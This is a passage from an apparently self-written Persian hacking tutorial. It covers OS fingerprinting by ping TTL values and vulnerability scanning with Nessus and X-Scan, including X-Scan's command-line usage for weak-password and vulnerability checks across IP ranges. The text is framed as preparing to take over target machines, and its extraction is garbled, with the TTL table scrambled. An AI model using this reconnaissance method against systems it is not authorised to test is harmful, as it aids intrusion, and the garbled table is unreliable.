time<1ms TTL=128 Reply from xxx.xxx.xxx.xxx: bytes=32 time<1ms TTL=128 Ping statistics for xxx.xxx.xxx.xxx : Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ﻣﻘﺪار TTL 32 128 128 60 64 64 64 64 128 60 60 60 2514255 60
ﻧﺎم ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ Windows 9x/NT Intel Windows XP PRO & Home Windows 2000 Digital Unix 4.0 Alpha Unisys x Mainframe Linux 2.2.x Intel 64 FTX(UNIX) 3.3STRTUS 64 SCO Compaq Netware 4.11 Intel AIX 4.3.X IBM/R6000 AIX 4.2.X IBM/R6000 Cisco 11.2 7507 Cisco 12.0 IRIX 6.x SGI
ﺧﻮب هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﺘﻮﺟﻪ ﺷﺪیﺪ ایﻦ ﮐﺎر دﻗﺖ زیﺎدی ﻧﺪارد .اﻟﺒﺘﻪ Nmapﺕﻮﺻﻴﻪ ﻣﻦ ﺏﺮای ﺷﻨﺎﺱﺎیﯽ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺱﺮویﺲ هﺎ اﺱﺖ . ﺕﺎ ﺏﻪ ﺡﺎل ٢ﻣﺮﺡﻠﻪ از ﻣﺮاﺡﻞ ۴ﮔﺎﻧﻪ هﮏ را ﺏﺮای ﺷﻤﺎ هﺎ ﻋﺰیﺰان ﺕﻮﺽﻴﺢ دادم و ﻓﻘﻂ یﮏ ﻣﺮﺡﻠﻪ دیﮕﺮ ﺏﺎﻗﯽ ﻣﺎﻧﺪﻩ ﮐﻪ ﺁن را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ. ﻗﺒﻮل دارم ﮔﺴﻴﺨﺘﮕﯽ ﻣﻄﺎﻟﺐ ﺕﺎ ﺏﻪ ایﻨﺠﺎ ﺏﺴﻴﺎر اﺱﺖ اﻣﺎ واﻗﻌًﺎ ﺏﻪ ﻣﻦ ﺡﻖ ﺏﺪهﻴﺪ ﮐﻪ ﻣﻄﻠﺐ ﺏﺴﻴﺎر اﺱﺖ و اﺏﺰارهﺎ ﺏﻴﺸﺘﺮ ﻣﻦ ﻧﻤﻴﺪاﻧﻢ از ﮐﺪام ﺏﻨﻮیﺴﻢ و ﭼﻪ ﺏﻨﻮیﺴﻢ!! در ﺽﻤﻦ ﺱﻌﯽ ﻣﻦ ﺏﺮ ایﻦ اﺱﺖ ﺕﺎ ﺷﻤﺎ ﺏﻔﻬﻤﻴﺪ ﮐﻪ اﺻﻼ ایﻦ ﻋﻤﻠﻴﺎت هﺎ و ﻣﮑﺎﻧﻴﺰم هﺎ ﭼﮕﻮﻧﻪ اﻧﺠﺎم ﻣﻴﺸﻮد و ایﻦ ﮐﺎر را ﺧﻴﻠﯽ ﻣﺸﮑﻞ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤١
ﺕﺮ ﻣﻴﮑﻨﺪ ﭼﻮن ﻣﻦ ﺏﺎیﺪ از اﺻﻮل ایﻦ ﮐﺎر ﺏﺮای ﺷﻤﺎ ﺏﮕﻢ ﮐﻪ واﻗﻌًﺎ در ایﻦ ﺏﺎرﻩ ﻣﻄﻠﺐ ﺧﻴﻠﯽ ﮐﻢ اﺱﺖ و اﻟﺒﺘﻪ ﺏﺎیﺪ ﺧﻮاﻧﻨﺪﻩ یﮑﺴﺮی اﻃﻼﻋﺎت ﭘﺎیﻪ داﺷﺘﻪ ﺏﺎﺷﺪ .وﻟﯽ ﻣﻦ ﺱﻌﯽ ﮐﺮدم ) یﻌﻨﯽ ( %۶٠ﮐﻪ ایﻦ ﻣﻄﻠﺐ ﺏﺮای ﺁﻧﻬﺎی ﮐﻪ ﻣﻔﻬﻮم هﺎی ﭘﺎیﻪ ایﯽ هﻤﭽﻮن ﭘﻮرت و یﺎ Telnetو ...را ﺏﺪاﻧﻨﺪ ﻣﻔﻴﺪ ﺏﺎﺷﺪ. ﮔﺎم ﺱﻮم ﻣﻘﺪﻣﻪ : ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل ﺷﻤﺎ ﭘﻮرت هﺎی ﺏﺎز ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی و ﺱﺮویﺲ دهﻨﺪﻩ هﺎ و ﻣﺸﺨﺼﺎت ﺷﺒﮑﻪ ه ﺪف و ی ﺎ ﻣﺎﺷ ﻴﻨﻬﺎی ﮐ ﻪ در ﺁن ﺷﺒﮑﻪ اﺱﺖ را ﻣﺸﺨﺺ ﮐﺮدﻩ ایﺪ و اﻃﻼﻋﺎت ﮐﺎﻣﻠﯽ داریﺪ .در ایﻦ ﺟﺎ ﻣﻤﮑﻦ اﺱﺖ دو اﺕﻔﺎق ﺏﻴﻔﺘﺪ یﺎ ﺷﻤﺎ ﺏﺎ ﺕﺠﺮﺏﻪ ای ﺪ ﮐ ﻪ هﻴﭽ ﯽ ی ﺎ ﺏ ﺪون ﺕﺠﺮﺏ ﻪ اﮔﺮ ﻋﺠﻮل ﻧﻴﺴﺘﻴﺪ ایﻦ ﻣﺮﺡﻠﻪ را اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﺏﻌﺪ ﺕﻬﺎﺟﻢ اﺻﻠﯽ ﺏﺮای ﺏﺪﺱﺖ ﮔﺮﻓﺘﻦ ﻣﺎﺷﻴﻦ هﺪف را ﺁﻏﺎز ﻣﻴﮑﻨﻴﻢ .اﮔﺮ ﻋﺠﻮل هﺴﺘﻴﺪ ﮐﻪ ﻓﮑ ﺮ ﻣﻴﮑ ﻨﻢ دیﮕﻪ ﺏﻪ ایﻦ ﻣﺮﺡﻠﻪ هﻢ ﻧﺮﺱﻴﺪﻩ ایﺪ ﭼﻮن ﻣﺜﻼ اﮔﺮ یﮏ ﭘﻮرت ﺏﺎز ﮐﻪ ﺕﻮﺱﻂ یﮏ اﺱﺐ ﺕﺮوا یﺎ یﮏ در ﭘﺸﺘﯽ ﺏﺎز ﺷﺪﻩ ﺱﺮاغ ﺁﻧﻬﺎ رﻓﺘﻪ ایﺪ و ﺏﻪ ﻧ ﻮﻋﯽ ﻣﺮدﻩ ﺧﻮری ﻣﯽ ﮐﻨﻴﺪ .ﻣﺎ در ایﻦ ﻣﺮﺡﻠﻪ ﻣﻴﺪاﻧﻴﻢ ﮐﻪ ﻣﺜﻼ ﻣﺎﺷﻴﻦ هﺪف ﭼﻪ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ روی ﺁن هﺴﺖ و ...ﺏ ﺎ داﻧ ﺴﺘﻦ ای ﻦ ﻣﻮﺽ ﻮع ﻣﻴﺘ ﻮاﻧﻴﻢ ﺱ ﺮاغ ﺡﻔﺮﻩ هﺎی ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺁن رﻓﺘﻪ ) اﮔﺮ از ﺡﻔﺮﻩ هﺎی ﺁن اﻃﻼﻋﯽ ﻧﺪاریﺪ ﺏﻪ یﮏ از ﺱﺎیﺘﻬﺎی ﻣﺸﻬﻮر ﮐﻪ در اداﻣﻪ ﻣﻴﮕﻮیﻢ ﻣﺮاﺟﻌﻪ ﮐﻨﻴ ﺪ (و Exploit هﺎی ﺁن را اﺱﺘﻔﺎدﻩ ﮐﺮدﻩ وﻟﯽ ﻣﻌﻤﻮﻻ ایﻦ ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﺏﺴﻴﺎر زیﺎد اﺱﺖ و اﻟﺒﺘﻪ ﻣﺪیﺮ ﺱﺎیﺖ یﺎ ﺁن ﺱ ﺮور Patchه ﺎی ﺁن ﺡﻔ ﺮﻩ ه ﺎ را ﻣﻌﻤ ﻮﻻ ﻧﺼﺐ ﻣﻴﮑﻨﻨﺪ و اﻧﺠﺎم ﺕﮏ ﺕﮏ ایﻦ ﮐﺎر ﺏﺴﻴﺎر ﻣﺸﮑﻞ اﺱﺖ .ﺧﻮب ﻣﺎ ایﻦ ﻣﺮﺡﻠﻪ را ﺏﺮای ایﻦ اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﮐﻪ ایﻦ ﮐﺎر را اﺕﻮﻣﺎﺕﻴ ﮏ ﮐ ﺮدﻩ و ﺡﻔ ﺮﻩ هﺎی اﺱﻴﺐ ﭘﺬیﺮ را زودﺕﺮ ﮐﺸﻒ ﮐﻨﻴﻢ ) ﮔﻔﺘﻢ ﺏﻌﻀﯽ ﺡﻔﺮﻩ هﺎ ﺏﻪ واﺱﻄﻪ Patchهﺎ ﻣﺸﮑﻞ ان هﺎ ﺏﺮﻃﺮف ﻣﻴﺸﻮد ( اﻟﺒﺘﻪ یﮏ هﺪف دیﮕ ﺮ ه ﻢ داری ﻢ ﺁن هﻢ ایﻦ اﺱﺖ ﮐﻪ ﻣﻌﻤﻮﻻ ﻧﺮم اﻓﺰارهﺎی ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی ﻣﻌﻤ ﻮﻻ ﻣﺘ ﺪهﺎی ه ﮏ را ه ﻢ ﺁزﻣ ﺎیﺶ ﻣﻴﮑﻨﻨ ﺪ و اﮔ ﺮ ﺟ ﻮاب ده ﺪ ﺏ ﻪ ﻣ ﺎ اﻃ ﻼع ﻣﻴﺪهﻨﺪ .ﺡﺘﻤﺎ ﻣﺘﻮﺟﻪ ﺷﺪیﺪ ﮐﻪ اﮔﺮ ﺕﺠﺮﺏﻪ ﺧﻮﺏﯽ در اﺧﺘﻴﺎر داﺷﺘﻪ ﺏﺎﺷﺪ ﺏﺮاﺡﺘﯽ ﻣﻴﺘﻮاﻧﻴﺪ ایﻦ ﻣﺮﺡﻠﻪ را ﻧﺎدیﺪﻩ ﮔﺮﻓﺘﻪ و ﮐﺎر را یﮏ ﺱﺮﻩ ﮐﻨﻴﺪ وﻟﯽ ﻣﻦ ﺕﻤﺎم ﺁﻧﻬﺎیﯽ را ﮐﻪ در ایﻦ ﻣﺪت ﻣﻴﺸﻨﺎﺱﻢ و اﻟﺒﺘﻪ ﻗﺒﻮل دارم ﺁﻧﻬﺎ را ﺏﺎ ایﻨﮑﻪ ﺕﺠﺮﺏﻪ ﺏﺴﻴﺎر ﻓﻮق اﻟﻌﺎدﻩ ایﯽ در ﮐﻞ اﻣﻮرات ه ﮏ دارﻧ ﺪ ای ﻦ ﻣﺮﺡﻠ ﻪ را ﺏﻪ هﻴﭻ وﺟﻪ ﻧﺎدیﺪﻩ ﻧﻤﯽ ﮔﻴﺮﻧﺪ و ﺏﻪ ﻗﻮل یﮑﯽ از ﺁﻧﻬﺎ ﮐﻪ هﻤﻴﺸﻪ ﻣﯽ ﮔﻔ ﺖ " :ﺁدم ﻣﻐ ﺮور ...ﻣﻴ ﺸﻮد " و ﺱ ﺨﻦ ﺁﺏﺮاه ﺎم را هﻤﻴ ﺸﻪ ﺕﮑ ﺮار ﻣ ﯽ ﮐ ﺮد. اول ایﻦ ﻣﻘﺎﻟﻪ ﮔﻔﺘﻢ ﺱﺨﻦ را ﺡﺎﻻ یﮏ ﺏﺎر دیﮕﺮ ﻣﻴﮕﻮیﻢ " ﭼﻨ ﺎن ﭼ ﻪ ﻗ ﺮار ﺏﺎﺷ ﺪ درﺧﺘ ﯽ را در ﻣ ﺪت ۶ﺱ ﺎﻋﺖ ﻗﻄ ﻊ ﮐ ﻨﻢ ۴ ،ﺱ ﺎﻋﺖ ﻧﺨ ﺴﺖ ﺁن را ﺻﺮف ﺕﻴﺰ ﮐﺮدن ﺕﺒﺮ ﺧﻮاهﻢ ﮐﺮد " .ﻣﻌﺮﻓﯽ ایﻦ ﭘﻮیﺶ ﮔﺮ هﺎ ﮐﻪ اﻟﺒﺘﻪ ﺏﺮای هﺮ ﺱﺮویﺴﯽ ﺕﺨﺼﺼﯽ ﻧﻴﺰ هﺴﺘﻨﺪ یﮏ ﮐﻤﯽ دردﺱﺮ ﺱ ﺎز اﺱ ﺖ ﭼ ﻮن ﺏﻴﺸﺘﺮ اﺏﺰارهﺎی ﺧﻮب ﺁن ،ﮐﻪ ﮐﻤﺘﺮ اﺷﺘﺒﺎﻩ ﻣﯽ ﮐﻨﺪ روی ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ﻟﻴﻨﻮﮐﺲ اﺟﺮا ﻣﻴﺸﻮﻧﺪ ﺕﺎ ویﻨ ﺪوز اﻣ ﺎ اﺧﻴ ﺮ ی ﮏ ﮐ ﺎرایﯽ ﺷ ﺪﻩ اﻣ ﺎ واﻗﻌ ًﺎ ﻧﻤﯽ ﺷﻮد ﺧﻠﻊ ﻣﻮﺟﻮد را ﺕﻮﺟﻴﻪ ﮐﺮد. اﺏﺰار : Nessus ﺏﺮﻧﺎﻣﻪ ﮐﺪ ﺏﺎزی اﺱﺖ و اﻟﺒﺘﻪ رایﮕﺎن و یﮑﯽ از ﺏﻬﺘﺮیﻦ ایﻦ اﺏﺰارهﺎ ،ﮐﻪ اﻟﺒﺘﻪ ﮐﺎرایﯽ ﺏﺴﻴﺎر ﻋﺎﻟﯽ دارد ﮐﻪ ﻣﺘﺄﺱﻔﺎﻧﻪ روی ویﻨﺪوز اﺟ ﺮا ﻧﻤ ﯽ ﺷ ﻮد و ﺏﺮای ﺱﻴﺴﺘﻢ هﺎی ﻟﻴﻨﻮﮐﺲ اﺱﺖ )ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ اﮔﺮ زﻣﺎﻧﯽ ﺏﻮد ﻧﺮم اﻓﺰارهﺎ ﻣﺎﺷﻴﻦ ﻣﺠﺎزی و ﺷﺒﻪ ﺱﺎز ﻟﻴﻨﻮﮐﺲ را ﺕﻮﺽﻴﺢ ﻣﻴ ﺪهﻢ( .اﻟﺒﺘ ﻪ ﭼ ﺮا ﻣﻦ دروغ ﺏﮕﻮیﻢ ﺏﺎ ایﻨﮑﻪ ﻓﻮق اﻟﻌﺎدﻩ اﺱﺖ ﻣﻦ اﺻﻼ از ﺁن ﺧﻮﺷﻢ ﻧﻤﯽ ایﺪ .ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺟﺪیﺪًا ) یﮑﯽ دو ﺱﺎل هﻤﺶ( ﺷﺮﮐﺖ Tenableﻧ ﺴﺨﻪ ویﻨﺪوز ﺁن را ﺏﺎ ﻧﺎم NeWT Security Scannerاﻧﺘﺸﺎر دادﻩ اﺱﺖ اﻟﺒﺘﻪ ایﻦ ﺷﺮﮐﺖ ﻧﮕﺮﻓﺘﻪ ﮐﺪ ه ﺎ را دوﺏ ﺎرﻩ ﺏ ﺮای ویﻨ ﺪوز ﺏﻨﻮی ﺴﺪ ﺏﻠﮑ ﻪ ﺷ ﻴﻮﻩ ﻧﮕﺎرش Plug-inهﺎ را ﺏﺎ ﻧﻮﺷﺘﻦ یﮏ ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ ﺏﻪ ویﻨﺪوز ﺡﺎﻟﯽ ﮐﺮدﻩ اﺱﺖ .ایﻦ را ﻣﻴﺪاﻧﻴﺪ ﮐﻪ scriptsهﺎی ای ﻦ ﺏﺮﻧﺎﻣ ﻪ Nessusاز زﺏ ﺎن ﺧﺎص ﺧﻮدش ﺏﺎ ﻧﺎم Nessus Attack Scripting Languageﮐﻪ ﺏﻪ ﺻﻮرت NSALﮔﻔﺘ ﻪ ﻣﻴ ﺸﻮد و ﭘ ﺴﻮﻧﺪ اﺱ ﮑﺮیﭙﺖ ه ﺎی ﭘ ﻼگ ایﻨﻬ ﺎ ﻧﻴ ﺰ هﺴﺘﻨﺪ را ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ ﺧﻮد یﮏ ﺟﻮر ﺁی ﯽ ﺡ ﺎﻟﯽ ویﻨ ﺪوز ﮐ ﺮدﻩ اﻟﺒﺘ ﻪ ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎر ﺏ ﺎ ﺁن ﺱ ﺎدﻩ اﺱ ﺖ وﻟ ﯽ ﻧ ﺴﺨﻪ ﻣﻌﻤ ﻮﻟﯽ ﮐ ﻪ در ﺱﺎیﺖ ﮔﺬاﺷﺘﻪ ﻓﻘﻂ ﻣﻴﺘﻮاﻧﺪ ﮐﺎﻣﭙﻴﻮﺕﺮ ﺧﻮدﺕﺎن را ﭘﻮیﺶ ﮐﻨﺪ ﻧﻪ IPهﺎی ﮐﻼس Cرا ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺧﻮدش ﮔﻔﺘﻪ ﻣﻦ هﺮ ﭼﯽ ﮔﺸﺘﻢ ﻧﺴﺨﻪ ﺡﺮﻓ ﻪ ای ﺁن را ﮐﻪ ﺏﺮاش ﺕﺒﻠﻴﻎ ﻣﻴﮑﻨﺪ ﭘﻴﺪا ﻧﮑﺮدم وﻟﯽ ﺏﺎ ایﻦ ﺡﺎل ایﻦ را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ .یﮏ ﺏﺮﻧﺎﻣ ﻪ دیﮕ ﺮ ﺏ ﺮای ﭘ ﻮیﺶ ﻧﻘ ﺎط ﺁﺱ ﻴﺐ ﭘ ﺬیﺮ ه ﺴﺖ ﮐ ﻪ ﮐ ﺎرایﯽ ﺧ ﻮﺏﯽ ﻧﻴ ﺰ دارد و از scriptsه ﺎی ﺏﺮﻧﺎﻣ ﻪ Nessusاﺱ ﺘﻔﺎدﻩ ه ﻢ ﻣﻴﮑﻨ ﺪ ﺏﺮﻧﺎﻣ ﻪ X-Scanاﺱ ﺖ ﮐ ﻪ از ایﻨﺠ ﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ دریﺎﻓ ﺖ ﮐﻨﻴ ﺪ ﺁن را و ﻣ ﻦ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ از ایﻦ ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﺧﻮدش یﮏ ﻧﻮع Nessusﺏﺮای ویﻨﺪوز و ﮐﺎرای ﺁن ﻣﺎﻓﻮق ﻓﻮق اﻟﻌﺎدﻩ اﺱﺖ .ای ﻦ ی ﮏ ﺕﻮﺽ ﻴﺢ ﺏ ﺪهﻢ ﮐﻪ ﺏﺮﻧﺎﻣﻪ Nessusﭼﻮن از زﺏﺎن ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺴﯽ ﺧﺎص ﺧﻮدش ﮐﻪ ﺏﺎﻻ ﮔﻔﺘﻢ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ ) ﺏﺮای scriptsهﺎ ،ﮐﻼ scriptsﺏ ﻪ ﮐ ﺪ ه ﺎی ﮐ ﺸﻒ ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻣﻴﮕﻮیﻨﺪ ﮐﻪ ﭘﺴﻮﻧﺪ ﺁﻧﻬ ﺎ NSLAﺏ ﺮای ﺏﺮﻧﺎﻣ ﻪ Nessusاﺱ ﺖ و ﺏﺮﻧﺎﻣ ﻪ ه ﺎیﯽ ﮐ ﻪ از ای ﻦ ﻧ ﻮع scriptsه ﺎ اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﺪ ﺕﻮاﻧ ﺎیﯽ ﻣﺸﺎﺏﻪ ﻧﺮم اﻓﺰار Nessusﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ هﺴﺘﻨﺪ ( و ﻣﻨﺒﻊ ﺏﺎز اﺱ ﺖ ﺁﻧﻘ ﺪر ﻣ ﺸﻬﻮر اﺱ ﺖ اﻟﺒﺘ ﻪ ﺏ ﻪ ﺡ ﻖ ﻧﻴ ﺰ اﺱ ﺖ و ﻣ ﻦ ﻣﻨﮑﺮ ﺁن ﻧﻴﺴﺘﻢ هﻤﺎﻧﻄﻮر ﮐﻪ ﮔﻔﺘﻢ ﺏﻬﺘﺮ اﺱﺖ از ﺏﺮﻧﺎﻣﻪ X-Scanدر ویﻨﺪوز اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﮐﻪ ﻣﺠﺎﻧﯽ ه ﻢ اﺱ ﺖ .ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ﮐ ﻪ ﺏﺮﻧﺎﻣ ﻪ ه ﺎی زیﺎدی دیﮕﺮ ﺡﺎﻻ ﺏﺮای ویﻨﺪوز ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﮐﻪ از scriptsه ﺎی Nessusﺏ ﺮای ﭘ ﻮیﺶ ﺡﻔ ﺮﻩ ه ﺎی اﺱ ﻴﺐ ﭘ ﺬیﺮی ﻗﺮﺏ ﺎﻧﯽ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨ ﺪ ﺏ ﻪ هﻤ ﻴﻦ ﺧﺎﻃﺮ ﺏﺮ ﺏﭽﻪ هﺎی ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ ﻧﺮﻓﺘﻦ ﻧﺴﺨﻪ ویﻨﺪوز ایﻦ ﺏﺮﻧﺎﻣﻪ را ﻣﺜﻞ Nmapدرﺱﺖ ﮐﻨﻨ ﺪ ی ﮏ ذرﻩ دﻧﺒ ﺎل ﺏﮕﺮدی ﺪ ﺡﺘﻤ ﺎ ﻧﺮﻣﺎﻓﺰاره ﺎی ﺏﻬﺘ ﺮی را ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ. ﻧﺴﺨﻪ ویﻨﺪوز Nessusﺏﺮﻧﺎﻣﻪ : X-Scan ﻣﻘﺪﻣﻪ ﺏﺮﻧﺎﻣﻪ : ﺧﻮب ایﻦ ﺏﺮﻧﺎﻣﻪ از ﺕﻴﻢ xfocusاﺱﺖ ﮐﻪ ﺟﺰو اوﻟﻴﻦ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﺏﻮد ﺏﺮای ویﻨﺪوز ﮐﻪ از scriptsهﺎی Nessusﺏﺮای ﭘﻮیﺶ ﺡﻔ ﺮﻩ ه ﺎی اﺱ ﻴﺐ ﭘﺬیﺮی ﻗﺮﺏﺎﻧﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﺮد و ﮐﺎرایﯽ ﺧﻮﺏﯽ هﻢ دارد ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺴﺨﻪ ٣٫١ﺁن را از ﺏﺎﻻ دریﺎﻓﺖ ﮐﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻧﻴﺎزی ﺏﻪ ﻧﺼﺐ ﻧ ﺪارد و ﺏﻌ ﺪ
٤٢
ﺻﻔﺤﻪ
!! آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم
ه ﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ از ﺏﺮﻧﺎﻣ ﻪscripts ﺏ ﻪ هﻤ ﺮاﻩ دارد ﺏ ﺮای دریﺎﻓ ﺖ ﺟﺪی ﺪ ﺕ ﺮیﻦscripts ٣٧١٣ از ﺧﺎرج ﮐﺮدن ﺁن از ﺡﺎﻟﺖ ﻓﺸﺮدﻩ ﺏﻪ هﻤ ﺮاﻩ ﺧ ﻮدش : ( راﺏﻂ ﮐﺎرﺏﺮی اش ایﻦ ﺷﮑﻠﯽX-Scan ) ایﻦ ﺏﺮﻧﺎﻣﻪ. اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪUpdate.exe هﻤﺮاﻩ ﺧﻮدش ﺏﻪ ﻧﺎم
ﮐﻪ ﮐﺎر ﺏ ﺎ را ﺱ ﺎدﻩ ﻣ ﯽ ﮐﻨ ﺪ ﺏ ﺮای ﺕ ﺎزﻩ ﮐﺎره ﺎ و ه ﻢ دارای ی ﮏ ﻧ ﺴﺨﻪxscan_gui دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی ﺱﺎدﻩ اﺱﺖ ﺏﻪ ﻧﺎمX-Scan ﺏﺮﻧﺎﻣﻪ ﮐ ﻪ ﺏﻌ ﺪ از اﺟ ﺮای ﺁن در ﺧ ﻂ ﻓﺮﻣ ﺎن ای ﻦ. ﮐ ﻪ ﻣ ﻦ ﻧ ﺴﺨﻪ ﺧ ﻂ ﻓﺮﻣ ﺎن را دوﺱ ﺖ دارم ﻣﻠ ﯽ ه ﻴﭻ ﻓﺮﻗ ﯽ ﺏ ﺎ ه ﻢ ﻧﻤ ﯽ ﮐﻨ ﺪXscan ﺧﻂ ﻓﺮﻣﺎن ﺏﻪ ﻧﺎم :ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ C:\X-Scan-v3.1>xscan.exe Usage: xscan -host <startIP>[-<endIP>] <module> [option] xscan -file <module> [option] <module> means: -active : check if the target host is active -port : check the status of tcp port -smb : check NT-Server weak password -netbios : check Netbios information -snmp : check SNMP information -os : check target OS version -ftp : check FTP-Server weak password -pub : Check anonymous pub write permission -pop3 : check POP3-Server weak password -smtp : check SMTP-Server vulnerability -sql : check SQL-Server weak password -iis : check IIS encode/decode vulnerability -cgi : check cgi vulnerability -nasl : load Nessus Attack Scripts -all : check all vulnerability [option] means: -i : set network interface -l: list network interface to get the -v: display verbose information -p: skip host when no response -o: skip host when no opened port be found -t : specify the maximal thread count and host count, default is 100,10 -log : specify the report filename, text or html format Example: xscan -host xxx.xxx.1.1-xxx.xxx.254.254 -all xscan -host xxx.xxx.1.1-xxx.xxx.254.254 -port -smb -p -t 100 xscan -file host.lst -port -cgi -t 100,5 -v -o
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤٣
ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن اﺟﺎزﻩ ﺏﻴﺸﺘﺮی ﺏﻪ ﻣﺎ ﺏﺮای ﮐﻨﺘﺮل ﺏﺮﻧﺎﻣﻪ ﻣﻴﺪهﺪ ﮐﻪ اﻟﺒﺘﻪ ﻓﮑﺮ ﮐﻨﻢ ﺷﻤﺎ دوﺱﺘﺎن ﺕﺎزﻩ ﮐﺎر ﺧﻮﺷﺘﺎن ﻧﻤﯽ ﺁیﺪ از ﺁن و یﺎ ﺏﻬﺘ ﺮ ﺏﮕ ﻢ ﮐ ﻪ اﺻﻼ از ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻂ ﻓﺮﻣﺎن ،وﻟﯽ ﺏﺎور ﮐﻨﻴﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻂ ﻓﺮﻣﺎن دارای ﭘﺎیﺪاری ﺏﻬﺘﺮ و ﺟ ﻮاب ه ﺎی ﺻ ﺤﻴﺢ ﺕ ﺮی ه ﺴﺘﻨﺪ ﭼ ﻮن ﻧ ﺴﺨﻪ هﺎی ﮔﺮاﻓﻴﮑﯽ در ویﻨﺪوز در ﺻﻮرت ﮐﻤﺒﻮد ﺡﺎﻓﻈﻪ ﮐﻪ ﻣﺜﻼ ﺏ ﺎ ﺏ ﺎﻻ ﺁﻣ ﺪن ی ﮏ ﺏﺮﻧﺎﻣ ﻪ و ﭘ ﺮ ﺷ ﺪن " ﭘ ﺸﺘﻪ " ﻣﻤﮑ ﻦ اﺱ ﺖ ی ﮏ ﺱ ﺮی از اﻃﻼﻋ ﺎت هﻤﺎن ﻟﺤﻈﻪ را از دﺱﺖ ﺏﺪهﻨﺪ و ...ﭘﺲ ﺏﻬﺘﺮ اﺱﺖ از ﺧﻂ ﻓﺮﻣﺎن اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﻴﻢ .ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ﮐ ﻪ راﺏ ﻂ ﮐ ﺎرﺏﺮ) (xscan_guiﻓﻘ ﻂ ی ﮏ راﺏ ﻂ اﺱﺖ ﻧﻪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﭼﻮن ﺷﻤﺎ ﺏﺎ ﺕﻨﻈﻴﻢ ﺁن و ﺷﺮوع ﭘﻮیﺶ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻌﺎدل هﻤﺎن ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏﺮای ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن ایﺠﺎد ﮐﺮدﻩ و ﺏﺮﻧﺎﻣﻪ ﺧ ﻂ ﻓﺮﻣﺎن را در ﭘﺸﺖ ﺽﻤﻴﻤﻪ اﺟﺮا ﻣﻴﮑﻨﺪ .و ﺟﻮاﺏﻬﺎ را دوﺏﺎرﻩ از ﺏﺮﻧﺎﻣﻪ ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﮕﻴﺮد و ﺏﻪ ﺻﻮرت ﮔﺮاﻓﻴﮑﯽ ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ. اوﻟﻴﻦ ﻧﺴﺨﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﺎل ٢٠٠٠/١٢/١٢ﺏﻮد ﺁﺧﺮیﻦ ﻧﺴﺨﻪ اش ﮐﻪ اﻻن ﻓﮑﺮ 